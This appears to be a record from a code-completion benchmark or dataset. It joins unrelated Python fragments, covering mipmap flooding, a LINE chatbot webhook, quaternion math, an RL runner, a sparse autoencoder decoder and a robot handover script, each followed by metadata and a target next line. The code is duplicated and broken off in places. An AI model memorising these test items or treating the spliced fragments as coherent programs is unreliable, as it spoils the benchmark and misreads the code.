    up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
    return up_scaled_avg
def _calculate_image_height(image_width: int, image: "Image.Image") -> int:
    """Return the height preserving *image*'s aspect ratio at *image_width*."""
    original_width, original_height = image.size
    # Scale the height by the same factor the width was scaled by; truncate to
    # int because PIL resize expects integer dimensions.
    return int(original_height * (image_width / original_width))
def _stack_mip_levels(average_bgr: "Image.Image", miplevels: int, color: "Image.Image", origin_width: int, origin_height: int,
                      output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
    """Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
    # Start from the flat average-color background; each mip level is pasted
    # on top, from the smallest (2 px wide) up to the original resolution.
    stack = average_bgr
    logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
    logger.info(f"--- Beginning the stacking process. Please wait...")
    for miplevel in range(miplevels):
        # Mip widths double each level: 2, 4, 8, ...
        width = 2 ** (miplevel + 1)
        height = _calculate_image_height(width, color)
        new_image = color.resize((width, height), resample)
        # Upscale back with NEAREST so each mip keeps hard texel edges.
        to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
        img_copy = stack.copy()
        # NOTE(review): to_stack is passed as its own paste mask, which
        # presumably requires the color image to carry an alpha channel
        # (e.g. RGBA) -- confirm against callers.
        img_copy.paste(to_stack, (0, 0), to_stack)
        stack = img_copy.copy()
    logger.info(f"--- Saving stack to file: {output_dir}")
    stack.save(output_dir)
    logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger: logging.Logger, message: str, level: int = logging.ERROR) -> None:
    """Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
    logger.log(level=level, msg=message)
    # terminate_loggers presumably flushes and closes the logger's handlers so
    # the log file is finalized -- see the .logger module for details.
    terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
    """Create a logger writing to ``<directory>/logs/<filename stem>.txt``.

    Ensures the logs directory exists and truncates any previous log file
    before handing back a configured logger.
    """
    logs_directory = Path(directory) / "logs"
    logs_directory.mkdir(parents=True, exist_ok=True)
    # Path.stem strips only the final extension, so dotted names like
    # "albedo.v2.png" map to "albedo.v2.txt" (the old split('.')[0] would have
    # collapsed them to "albedo.txt").
    out_log_file = logs_directory / f"{Path(filename).stem}.txt"
    clear_log_file(out_log_file)
    return setup_logger("mipmap_flooding", str(out_log_file))
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter()
| # Default packages
# Third party packages
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
"""Open and return the color and alpha images as a list of Image objects."""
logger.info("--- Opening images in memory...")
if not color:
color = str(None)
if not alpha:
alpha = str(None)
color_map = None if not Path(color).exists() else Image.open(color)
alpha_mask = None if not Path(alpha).exists() else Image.open(alpha).convert('L')
if color_map:
logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
return [color_map, alpha_mask]
def _validate_inputs(color: "Image.Image", alpha_mask: "Image.Image", logger: logging.Logger,
                     input_texture_color_abs_path: str) -> Optional[str]:
    """Validate the opened inputs and return an error message, or None if valid.

    Checks, in order: both images exist, their resolutions match, and the
    color image has power-of-two dimensions. The first failing check wins.
    (Return annotation fixed: the previous ``str | Optional[None]`` was
    meaningless; this returns ``Optional[str]``.)
    """
    if color is None or alpha_mask is None:
        message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
    elif not _do_resolutions_match(color, alpha_mask, logger):
        message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
    elif not _is_power_of_two_image(color, logger):
        message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
    else:
        message = None
    return message
def _do_resolutions_match(color: "Image.Image", alpha: "Image.Image", logger: logging.Logger) -> bool:
    """Return True when the color and alpha images have the same resolution."""
    logger.info("--- Verifying that inputs resolutions do match ...")
    # PIL .size is a (width, height) tuple; tuple equality compares both axes.
    # The comparison is already a bool, so no ``True if ... else False``.
    return color.size == alpha.size
def _is_power_of_two_image(color: "Image.Image", logger: logging.Logger) -> bool:
    """Return True if every dimension of *color* is a power of two.

    A zero-sized dimension is rejected: the bit trick ``n & (n - 1) == 0``
    wrongly accepts 0, so dimensions must be strictly positive.
    """
    logger.info("--- Verifying that inputs are power of two images ...")
    return all(res > 0 and (res & (res - 1)) == 0 for res in color.size)
def _get_mip_levels(image: "Image.Image", logger: logging.Logger) -> int:
    """Return the number of mip levels: log2 of the image's shorter side.

    The caller has already verified power-of-two dimensions, so the log2 of
    the short side is (up to float rounding) an integer.
    """
    logger.info("--- Calculating mip map levels...")
    # min() replaces the manual short-side ternary; compute log2 once instead
    # of once for the log message and once more for the return value.
    mip_levels = round(math.log2(min(image.size)))
    logger.info(f"--- Done. Miplevels: {mip_levels}")
    return mip_levels
def _generate_background(image: Image, logger: logging.Logger) -> Image:
"""Generate a background image and returns the result Image object."""
logger.info("--- Generating background image and storing it in memory...")
average_image_color = image.resize((1, 1))
up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
return up_scaled_avg
def _calculate_image_height(image_width: int, image: "Image.Image") -> int:
    """Return the height preserving *image*'s aspect ratio at *image_width*."""
    original_width, original_height = image.size
    # Scale the height by the same factor the width was scaled by; truncate to
    # int because PIL resize expects integer dimensions.
    return int(original_height * (image_width / original_width))
def _stack_mip_levels(average_bgr: str, miplevels: int, color: Image, origin_width: int, origin_height: int,
output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
"""Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
stack = average_bgr
logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
logger.info(f"--- Beginning the stacking process. Please wait...")
for miplevel in range(miplevels):
width = 2 ** (miplevel + 1)
height = _calculate_image_height(width, color)
new_image = color.resize((width, height), resample)
to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
img_copy = stack.copy()
img_copy.paste(to_stack, (0, 0), to_stack)
stack = img_copy.copy()
logger.info(f"--- Saving stack to file: {output_dir}")
stack.save(output_dir)
logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger, message, level=logging.ERROR):
"""Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
logger.log(level=level, msg=message)
terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
    """Create a logger writing to ``<directory>/logs/<filename stem>.txt``.

    Ensures the logs directory exists and truncates any previous log file
    before handing back a configured logger.
    """
    logs_directory = Path(directory) / "logs"
    logs_directory.mkdir(parents=True, exist_ok=True)
    # Path.stem strips only the final extension, so dotted names like
    # "albedo.v2.png" map to "albedo.v2.txt" (the old split('.')[0] would have
    # collapsed them to "albedo.txt").
    out_log_file = logs_directory / f"{Path(filename).stem}.txt"
    clear_log_file(out_log_file)
    return setup_logger("mipmap_flooding", str(out_log_file))
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter() | out_directory = get_output_directory(out_abs_path) | 3 | 2023-10-25 11:05:59+00:00 | 4k |
Lin-jun-xiang/chatgpt-line-bot | chatgpt_linebot/urls.py | [
{
"identifier": "Memory",
"path": "chatgpt_linebot/memory.py",
"snippet": "class Memory(MemoryInterface):\n \"\"\"Chat Memory\n \n Args:\n storage (List[Dict[str, str]]): Chat history, ex: \n [\n {'role': 'system', 'content': 'You are a helpful assistant.'},\n ... | import sys
import config
from fastapi import APIRouter, HTTPException, Request
from linebot import LineBotApi, WebhookHandler
from linebot.exceptions import InvalidSignatureError
from linebot.models import *
from chatgpt_linebot.memory import Memory
from chatgpt_linebot.modules import (
Horoscope,
ImageCrawler,
chat_completion,
recommend_videos,
)
from chatgpt_linebot.prompts import girlfriend | 2,643 |
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
    """LINE Bot webhook callback

    Verifies the ``X-Line-Signature`` header against the channel secret and
    dispatches the webhook body to the registered event handlers.

    Args:
        request (Request): Request Object.

    Raises:
        HTTPException: Invalid Signature Error

    Returns:
        str: OK
    """
    signature = request.headers["X-Line-Signature"]
    body = await request.body()

    # handle webhook body
    try:
        handler.handle(body.decode(), signature)
    except InvalidSignatureError:
        # 400 with an accurate reason: the signature check failed. The
        # previous "Missing Parameter" detail was misleading -- the header is
        # present but does not match the channel secret.
        raise HTTPException(status_code=400, detail="Invalid signature")

    return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
    """Event - User sent message

    Routes an incoming text message:
      * ``@img <query>``   -> reply with a crawled image
      * ``@chat 星座運勢`` -> horoscope response
      * 1:1 chats          -> always answered via chat completion
      * groups/rooms       -> answered only when prefixed with ``@chat``

    Args:
        event (LINE Event Object)

    Refs:
        https://developers.line.biz/en/reference/messaging-api/#message-event
        https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
    """
    if not isinstance(event.message, TextMessage):
        return

    reply_token = event.reply_token
    user_id = event.source.user_id
    response = None

    # Get user sent message and prepend the persona prompt.
    user_message = event.message.text
    pre_prompt = girlfriend
    refine_message = f"{pre_prompt}:\n{user_message}"

    if user_message.startswith('@img'):
        try:
            img_crawler = ImageCrawler(nums=5)
            img_url = img_crawler.get_url(user_message.replace('@img', ''))
            image_message = ImageSendMessage(
                original_content_url=img_url, preview_image_url=img_url
            )
            line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
        # Narrowed from a bare ``except:`` so SystemExit/KeyboardInterrupt are
        # not swallowed; any crawl/encode failure still gets a fallback reply.
        except Exception:
            line_bot_api.reply_message(
                reply_token=reply_token,
                messages='Image cannot encode successfully.'
            )
        return

    if user_message.startswith('@chat 星座運勢'):
        response = horoscope.get_horoscope_response(user_message)
    elif event.source.type == 'user':
        user_name = line_bot_api.get_profile(user_id).display_name
        print(f'{user_name}: {user_message}')
        memory.append(user_id, 'user', refine_message)
        response = chat_completion(user_id, memory)
    elif event.source.type == 'group' and user_message.startswith('@chat'):
        group_id = event.source.group_id
        memory.append(group_id, 'user', refine_message.replace('@chat', ''))
        response = chat_completion(group_id, memory)
    elif event.source.type == 'room' and user_message.startswith('@chat'):
        room_id = event.source.room_id
        memory.append(room_id, 'user', refine_message.replace('@chat', ''))
        response = chat_completion(room_id, memory)

    # Reply with same message
    if response:
        messages = TextSendMessage(text=response)
        line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
"""
|
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
"""LINE Bot webhook callback
Args:
request (Request): Request Object.
Raises:
HTTPException: Invalid Signature Error
Returns:
str: OK
"""
signature = request.headers["X-Line-Signature"]
body = await request.body()
# handle webhook body
try:
handler.handle(body.decode(), signature)
except InvalidSignatureError:
raise HTTPException(status_code=400, detail="Missing Parameter")
return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
"""Event - User sent message
Args:
event (LINE Event Object)
Refs:
https://developers.line.biz/en/reference/messaging-api/#message-event
https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
"""
if not isinstance(event.message, TextMessage):
return
reply_token = event.reply_token
user_id = event.source.user_id
response = None
# Get user sent message
user_message = event.message.text
pre_prompt = girlfriend
refine_message = f"{pre_prompt}:\n{user_message}"
if user_message.startswith('@img'):
try:
img_crawler = ImageCrawler(nums=5)
img_url = img_crawler.get_url(user_message.replace('@img', ''))
image_message = ImageSendMessage(
original_content_url=img_url, preview_image_url=img_url
)
line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
except:
line_bot_api.reply_message(
reply_token=reply_token,
messages='Image cannot encode successfully.'
)
return
if user_message.startswith('@chat 星座運勢'):
response = horoscope.get_horoscope_response(user_message)
elif event.source.type == 'user':
user_name = line_bot_api.get_profile(user_id).display_name
print(f'{user_name}: {user_message}')
memory.append(user_id, 'user', refine_message)
response = chat_completion(user_id, memory)
elif event.source.type == 'group' and user_message.startswith('@chat'):
group_id = event.source.group_id
memory.append(group_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(group_id, memory)
elif event.source.type == 'room' and user_message.startswith('@chat'):
room_id = event.source.room_id
memory.append(room_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(room_id, memory)
# Reply with same message
if response:
messages = TextSendMessage(text=response)
line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
""" | videos = recommend_videos() | 3 | 2023-10-24 09:01:13+00:00 | 4k |
nv-tlabs/pacer | uhc/utils/math_utils_new.py | [
{
"identifier": "quaternion_matrix",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_matrix(quaternion):\n \"\"\"Return homogeneous rotation matrix from quaternion.\n\n >>> M = quaternion_matrix([0.99810947, 0.06146124, 0, 0])\n >>> numpy.allclose(M, rotation_matrix(0.123, [1,... | import torch
import math
import numpy as np
from uhc.utils.transformation import (
quaternion_matrix,
quaternion_about_axis,
quaternion_inverse,
quaternion_multiply,
rotation_from_quaternion,
rotation_from_matrix,
) | 2,298 |
def ewma(x, alpha=0.05):
    """Return the exponentially weighted moving average of sequence *x*.

    The first element seeds the average; each subsequent element contributes
    with weight ``alpha`` while the running average keeps ``1 - alpha``.
    """
    smoothed = x[0]
    for sample in x[1:]:
        smoothed = alpha * sample + (1 - alpha) * smoothed
    return smoothed
def normal_entropy(std):
    """Entropy of independent Gaussians with std *std*, summed over dim 1.

    Per-dimension differential entropy is ``0.5 + 0.5 * log(2 * pi * var)``;
    the result has shape ``(batch, 1)``.
    """
    variance = std.pow(2)
    log_term = torch.log(2 * variance * math.pi)
    per_dim_entropy = 0.5 + 0.5 * log_term
    return per_dim_entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
    """Log-density of *x* under a diagonal Gaussian, summed over dim 1.

    Evaluates ``-(x - mean)^2 / (2 std^2) - 0.5 log(2 pi) - log_std`` for each
    dimension and returns a ``(batch, 1)`` tensor.
    """
    variance = std.pow(2)
    per_dim = -(x - mean).pow(2) / (2 * variance) - 0.5 * math.log(2 * math.pi) - log_std
    return per_dim.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
    """Finite-difference generalized velocity between two qpos frames.

    Assumes the layout ``[root_pos(3), root_quat(4), joint_angles(...)]``
    (MuJoCo-style free joint -- TODO confirm against callers). Returns
    ``[lin_vel(3), root_ang_vel(3), joint_vel(...)]`` with the angular
    velocity expressed in the root frame, and optionally the linear velocity
    re-expressed in *transform*.
    """
    # Linear root velocity from the positional difference.
    v = (next_qpos[:3] - cur_qpos[:3]) / dt
    # Relative rotation from the current to the next root orientation.
    qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
    # qrel /= np.linalg.norm(qrel)
    axis, angle = rotation_from_quaternion(qrel, True)
    if angle > np.pi:  # wrap the angle into (-pi, pi]
        angle -= 2 * np.pi
    elif angle < -np.pi:
        angle += 2 * np.pi
    rv = (axis * angle) / dt
    # Express the root angular velocity in the root (local) frame.
    rv = transform_vec(rv, cur_qpos[3:7], "root")
    qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
    qvel = np.concatenate((v, rv, qvel))
    if transform is not None:
        # Optionally re-express the linear velocity in the requested frame.
        v = transform_vec(v, cur_qpos[3:7], transform)
        qvel[:3] = v
    return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
    """Finite-difference angular velocity for each body quaternion.

    *prev_bquat* / *cur_bquat* are flat arrays of concatenated quaternions
    (4 values per joint); the result is a flat array of 3 values per joint.
    """
    q_diff = multi_quat_diff(cur_bquat, prev_bquat)
    n_joint = q_diff.shape[0] // 4
    body_angvel = np.zeros(n_joint * 3)
    for i in range(n_joint):
        # Axis-angle of the relative rotation divided by dt gives the
        # per-joint angular velocity vector.
        body_angvel[3 * i : 3 * i + 3] = (
            rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
        )
    return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root":
|
def ewma(x, alpha=0.05):
avg = x[0]
for i in x[1:]:
avg = alpha * i + (1 - alpha) * avg
return avg
def normal_entropy(std):
var = std.pow(2)
entropy = 0.5 + 0.5 * torch.log(2 * var * math.pi)
return entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
var = std.pow(2)
log_density = -(x - mean).pow(2) / (2 * var) - 0.5 * math.log(2 * math.pi) - log_std
return log_density.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
v = (next_qpos[:3] - cur_qpos[:3]) / dt
qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
# qrel /= np.linalg.norm(qrel)
axis, angle = rotation_from_quaternion(qrel, True)
if angle > np.pi: # -180 < angle < 180
angle -= 2 * np.pi #
elif angle < -np.pi:
angle += 2 * np.pi
rv = (axis * angle) / dt
rv = transform_vec(rv, cur_qpos[3:7], "root")
qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
qvel = np.concatenate((v, rv, qvel))
if transform is not None:
v = transform_vec(v, cur_qpos[3:7], transform)
qvel[:3] = v
return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
q_diff = multi_quat_diff(cur_bquat, prev_bquat)
n_joint = q_diff.shape[0] // 4
body_angvel = np.zeros(n_joint * 3)
for i in range(n_joint):
body_angvel[3 * i : 3 * i + 3] = (
rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
)
return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root": | rot = quaternion_matrix(q)[:3, :3] | 0 | 2023-10-31 20:47:12+00:00 | 4k |
Improbable-AI/dexenv | dexenv/runner/base_runner.py | [
{
"identifier": "stack_data",
"path": "dexenv/utils/common.py",
"snippet": "def stack_data(data, torch_to_numpy=False, dim=0):\n if isinstance(data[0], dict):\n out = dict()\n for key in data[0].keys():\n out[key] = stack_data([x[key] for x in data], dim=dim)\n return ... | import numpy as np
import torch
from collections import deque
from dataclasses import dataclass
from omegaconf.dictconfig import DictConfig
from typing import Any
from dexenv.utils.common import stack_data
from dexenv.utils.data import TorchTrajectory
from dexenv.utils.info_util import TIMEOUT_KEY
from dexenv.utils.info_util import aggregate_traj_info
from dexenv.utils.info_util import info_has_key
from dexenv.utils.torch_utils import torch_to_np | 2,537 |
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True):
|
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True): | time_out = aggregate_traj_info(info, TIMEOUT_KEY, single_info=True) | 3 | 2023-10-25 17:22:41+00:00 | 4k |
ai-safety-foundation/sparse_autoencoder | sparse_autoencoder/autoencoder/components/unit_norm_decoder.py | [
{
"identifier": "ResetOptimizerParameterDetails",
"path": "sparse_autoencoder/autoencoder/types.py",
"snippet": "class ResetOptimizerParameterDetails(NamedTuple):\n \"\"\"Reset Optimizer Parameter Details.\n\n Details of a parameter that should be reset in the optimizer, when resetting\n it's c... | from typing import final
from jaxtyping import Float, Int64
from pydantic import PositiveInt, validate_call
from torch import Tensor
from torch.nn import Module, Parameter, init
from sparse_autoencoder.autoencoder.types import ResetOptimizerParameterDetails
from sparse_autoencoder.tensor_types import Axis
from sparse_autoencoder.utils.tensor_shape import shape_with_optional_dimensions
import einops
import torch | 1,910 | """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty(
| """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty( | shape_with_optional_dimensions(n_components, decoded_features, learnt_features), | 2 | 2023-10-27 07:37:15+00:00 | 4k |
NVlabs/handover-sim2real | examples/train.py | [
{
"identifier": "get_cfg",
"path": "handover_sim2real/config.py",
"snippet": "def get_cfg(handover_config_only=False):\n if not handover_config_only:\n cfg = _C\n else:\n cfg = _C_handover_config\n return cfg.clone()"
},
{
"identifier": "HandoverSim2RealPolicy",
"path"... | import argparse
import gym
import itertools
import numpy as np
import os
import ray
from datetime import datetime
from handover.benchmark_wrapper import EpisodeStatus, HandoverBenchmarkWrapper
from handover_sim2real.config import get_cfg
from handover_sim2real.policy import HandoverSim2RealPolicy
